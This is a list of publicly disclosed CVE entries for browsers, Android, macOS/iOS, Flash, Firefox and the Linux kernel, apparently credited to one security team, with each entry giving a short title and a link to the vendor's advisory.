Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/ms14-035

CVE-2014-0267
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/ms14-010

CVE-2016-1646
Out-of-bounds read in V8
http://googlechromereleases.blogspot.com/2016/03/stable-channel-update_24.html

CVE-2010-2297
Table layout crash bug from wushi
https://code.google.com/p/chromium/issues/detail?id=42723

CVE-2010-4206
chrome_55000000!WebCore::FEBlend::apply Memory corruption
https://code.google.com/p/chromium/issues/detail?id=60688

CVE-2014-8299
MTK TOCTTOU memory corruption
http://2014.zeronights.org/assets/files/slides/racingwithdroids.pdf

CVE-2016-2443
Qualcomm MDP escalation of privilege
https://source.android.com/security/bulletin/2016-05-01.html

CVE-2016-0811
libmediaplayerservice infoleak
https://source.android.com/security/bulletin/2016-02-01.html

CVE-2015-6637
misc-sd escalation of privilege
https://source.android.com/security/bulletin/2016-01-01.html

CVE-2015-6612
libmedia escalation of privilege
https://source.android.com/security/bulletin/2015-11-01.html

CVE-2015-6620
libstagefright escalation of privilege
https://source.android.com/security/bulletin/2015-12-01.html

CVE-2015-6622
Android Native Frameworks Library infoleak
https://source.android.com/security/bulletin/2015-12-01.html

CVE-2014-9410
Multiple Issues in Camera Drivers
https://www.codeaurora.org/projects/security-advisories/hall-of-fame

CVE-2014-4324
Multiple Issues in Camera Drivers
https://www.codeaurora.org/projects/security-advisories/hall-of-fame

CVE-2014-4321
Multiple Issues in Camera Drivers
https://www.codeaurora.org/projects/security-advisories/hall-of-fame

CVE-2014-0976
Multiple Issues in Camera Drivers
https://www.codeaurora.org/projects/security-advisories/hall-of-fame

CVE-2014-0975
Multiple Issues in Camera Drivers
https://www.codeaurora.org/projects/security-advisories/hall-of-fame

CVE-2015-3854
Permission leak in systemserver
https://blog.flanker017.me/series-of-vulnerabilities-in-system_server/

CVE-2015-3855
Permission leak in systemserver
https://blog.flanker017.me/series-of-vulnerabilities-in-system_server/

CVE-2015-3856
Denial of service in systemserver
https://blog.flanker017.me/series-of-vulnerabilities-in-system_server/

Apple

CVE-2013-5228 (Mobile Pwn2Own 2013 iOS 7)
Apple iOS Safari DocumentOrderedMap Remote Code Execution Vulnerability
https://support.apple.com/en-us/HT202897

CVE-2014-1303 (Pwn2Own 2014 Safari on OS X)
Apple Safari Heap Buffer Overflow Remote Code Execution Vulnerability
https://support.apple.com/zh-cn/HT202941

CVE-2014-1314 (Pwn2Own 2014 OS X sandbox bypass)
Apple OS X WindowsServer Sandbox Escape Vulnerability
https://support.apple.com/en-us/HT202966

CVE-2016-1859 (Pwn2Own 2016 Tencent Security Team Shield Safari on OS X)
Multiple memory corruption issues were addressed through improved memory handling in WebKit
https://support.apple.com/en-us/HT206565

CVE-2016-1804 (Pwn2Own 2016 Tencent Security Team Shield sandbox bypass on OS X)
Multi-Touch memory corruption
https://support.apple.com/en-us/HT206567

CVE-2016-1857 (Pwn2Own 2016 Tencent Security Team Sniper Safari on OS X)
Multiple memory corruption issues were addressed through improved memory handling in WebKit
https://support.apple.com/en-us/HT206565

CVE-2016-1815 (Pwn2Own 2016 Tencent Security Team Sniper sandbox bypass on OS X)
IOAcceleratorFamily memory corruption
https://support.apple.com/zh-cn/HT206567

CVE-2009-1690
MULTIPLE VENDOR WEBKIT ERROR HANDLING USE AFTER FREE VULNERABILITY
http://support.apple.com/kb/ht3613

CVE-2010-0047
Apple WebKit innerHTML element Substitution Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-029/

CVE-2010-0053
Apple WebKit CSS run-in Attribute Rendering Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-030/

CVE-2010-0050
Apple Webkit Blink Event Dangling Pointer Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-031/

CVE-2010-0048
Apple Webkit Anchor Tag Mouse Click Event Dispatch Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-146/

CVE-2010-0049
Apple WebKit RTL LineBox Overflow Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-152/

CVE-2010-1119
Apple Webkit Attribute Child Removal Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-091/

CVE-2010-1392
Apple Webkit Button First-Letter Style Rendering Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-154/

CVE-2010-1396
Apple Webkit Option Element ContentEditable Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-092/

CVE-2010-1397
Apple Webkit DOCUMENT_POSITION_DISCONNECTED Attribute Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-095/

CVE-2010-1398
Apple Webkit ContentEditable moveParagraphs Uninitialized Element Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-097/

CVE-2010-1399
Apple Webkit SelectionController via Marquee Event Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-094/

CVE-2010-1400
MULTIPLE VENDOR WEBKIT HTML CAPTION USE AFTER FREE VULNERABILITY
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index. xhtml?id=870

CVE-2010-1401
Apple Webkit First-Letter Pseudo-Element Style Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-098/

CVE-2010-1402
Apple Webkit ConditionEventListener Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-100/

CVE-2010-1403
Apple Webkit ProcessInstruction Target Error Message Insertion Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-099/

CVE-2010-1404
Apple Webkit Recursive Use Element Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-096/

CVE-2010-1665
aApple Webkit WebCore::FontFallbackList::determinePitch memory corruption
https://code.google.com/p/chromium/issues/detail?id=42294

CVE-2010-1749
Apple Webkit SVG RadialGradiant Run-in Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-101/

CVE-2010-1770
Apple Webkit CSS Charset Text Transformation Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-093/

CVE-2010-1786
Apple Webkit SVG ForeignObject Rendering Layout Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-141/

CVE-2010-1785
Apple Webkit SVG First-Letter Style Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-142/

CVE-2010-1784
Apple Webkit Rendering Counter Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-144/

CVE-2010-1787
Apple Webkit SVG Floating Text Element Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-153/

CVE-2010-3113
WebKit Security issue in SVGUseElement::buildShadowTree
http://www.securityfocus.com/bid/44199

CVE-2010-3114
WebKit Memory corruption with invalid text node cast for edit commands
https://code.google.com/p/chromium/issues/detail?id=49628

CVE-2010-1806
Apple Safari Webkit Runin Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-170/

CVE-2010-1822
Webkit Bad cast with svg:g element
https://code.google.com/p/chromium/issues/detail?id=55114

CVE-2010-1824
Apple Webkit Error Message Mutation Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-095/

CVE-2010-4198
Webkit Memory corruption in accessing floatptr of a textarea
https://code.google.com/p/chromium/issues/detail?id=55257

CVE-2010-3808
WebKit invalid cast issue exists in editing commands
http://support.apple.com/kb/HT4455

CVE-2010-3824
WebKit’s handling “use” elements in SVG documents
http://support.apple.com/kb/HT4455

CVE-2011-1118
WebKit Security:WebCore::HTMLTextAreaElement::updateValue
https://code.google.com/p/chromium/issues/detail?id=71388

CVE-2011-1117
WebKit Stale nodes in Document::recalcStyleSelector
https://code.google.com/p/chromium/issues/detail?id=71386

CVE-2011-1448
WebKit stale entries in gPercentHeightDescendantsMap
https://code.google.com/p/chromium/issues/detail?id=77130

CVE-2010-1823
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-0233
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-0234
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-0237
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-0240
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-1117
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-1449
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-1453
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-1462
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-1797
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-3438
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-2825
Webkit fontface Invalid Font Family Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-054/

CVE-2011-2855
MULTIPLE VENDOR WEBKIT SVG ELEMENT USE AFTER FREE VULNERABILITY
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index. xhtml?id=971

CVE-2011-3928
Webkit.org Webkit copyNonAttributeProperties Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-055/

CVE-2011-3035
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT5400

CVE-2012-0634
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT5191

CVE-2012-3683
APPLE SAFARI RENDERBOX INLINEBOX TYPE CONFUSION VULNERABILITY
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index. xhtml?id=998

CVE-2013-0961
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT5671

CVE-2012-1521
WebKit Heap-use-after-free in WebCore::RenderObjectChildList::destroyLeftoverChildren
http://googlechromereleases.blogspot.com/2011/04/chrome-stable-update. html

CVE-2014-1368
Multiple memory corruption issues existed in WebKit
https://support.apple.com/en-us/HT203007

CVE-2016-1824
IOHIDFamily memory corruption
https://support.apple.com/zh-cn/HT206567

CVE-2016-1860
Intel Graphics Driver memory corruption
https://support.apple.com/en-us/HT206567

CVE-2016-1716
AppleGraphicsPowerManagement memory corruption
https://support.apple.com/zh-cn/HT205731

CVE-2015-5768
AppleGraphicsControl memory corruption
https://support.apple.com/en-us/HT205031

CVE-2015-3676
AppleGraphicsControl memory corruption
https://support.apple.com/en-us/HT204942

CVE-2015-3702
Intel Graphics Driver memory corruption
https://support.apple.com/en-us/HT204942

CVE-2015-3705
IOAcceleratorFamily memory corruption
https://support.apple.com/en-us/HT204942

CVE-2015-3706
IOAcceleratorFamily memory corruption
https://support.apple.com/en-us/HT204942

Adobe

CVE-2007-0071 (Pwnie 2008 nomination)
Integer overflow in Adobe Flash Player 9.0.115.0 and earlier
http://www.securityfocus.com/bid/28695

CVE-2015-6678 (Pwn2Own 2015 Flash)
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-23.html

CVE-2015-5108 (Pwn2Own 2015 Adobe Reader)
Security Updates Available for Adobe Acrobat and Reader
https://helpx.adobe.com/security/products/acrobat/apsb15-15.html

CVE-2014-0510 (Pwn2Own 2014 Flash)
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb14-14.html

CVE-2011-2135
ADOBE FLASH PLAYER ACTIONSCRIPT DISPLAY MEMORY CORRUPTION VULNERABILITY
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index. xhtml?id=935

CVE-2012-2034
ADOBE FLASH PLAYER ACTIONSCRIPT DISPLAYOBJECT LAYOUT MEMORY CORRUPTION VULNERABILITY
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index. xhtml?id=987

CVE-2015-5087
Security Updates Available for Adobe Acrobat and Reader
https://helpx.adobe.com/security/products/acrobat/apsb15-15.html

CVE-2015-3124
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-16.html

CVE-2015-3083
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-09.html

CVE-2015-3082
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-09.html

CVE-2015-3081
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-09.html

CVE-2015-0351
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-06.html

CVE-2015-3040
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-06.html

CVE-2015-3041
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-06.html

CVE-2015-0342
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-05.html

CVE-2015-0322
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-04.html

Mozilla

CVE-2008-5021
Crash and remote code execution in nsFrameManager
http://www.mozilla.org/security/announce/2008/mfsa2008-55.html

CVE-2010-0183
Firefox Use-after-free error in nsCycleCollector::MarkRoots()
http://www.mozilla.org/security/announce/2010/mfsa2010-27.html

CVE-2010-3166
Firefox Heap buffer overflow in nsTextFrameUtils::TransformText
http://www.mozilla.org/security/announce/2010/mfsa2010-53.html

CVE-2010-3772
Firefox Crash and remote code execution using HTML tags inside a XUL tree
http://www.mozilla.org/security/announce/2010/mfsa2010-77.html

CVE-2012-0472
Firefox Potential memory corruption during font rendering using cairo-dwrite
http://www.mozilla.org/security/announce/2012/mfsa2012-25.html

Linux

CVE-2015-3636 (PingPong Root / Pwnie 2015 nomination)
Use-after-free flaw in the Linux kernel’s ipv4 ping support.
http://www.ubuntu.com/usn/usn-2631-1/

CVE-2016-4794
Linux Kernel bpf related UAF
http://seclists.org/oss-sec/2016/q2/332

CVE-2015-7292
Amazon Fire Phone kernel stack based buffer overflow
http://marcograss.github.io/security/android/cve/2016/01/15/cve-2015-7292-amazon-kernel-stack-buffer-overflow.html

Misc

CVE-2006-7222
Media Player Classic FLI File Processing Buffer Overflow
http://www.securityfocus.com/bid/25437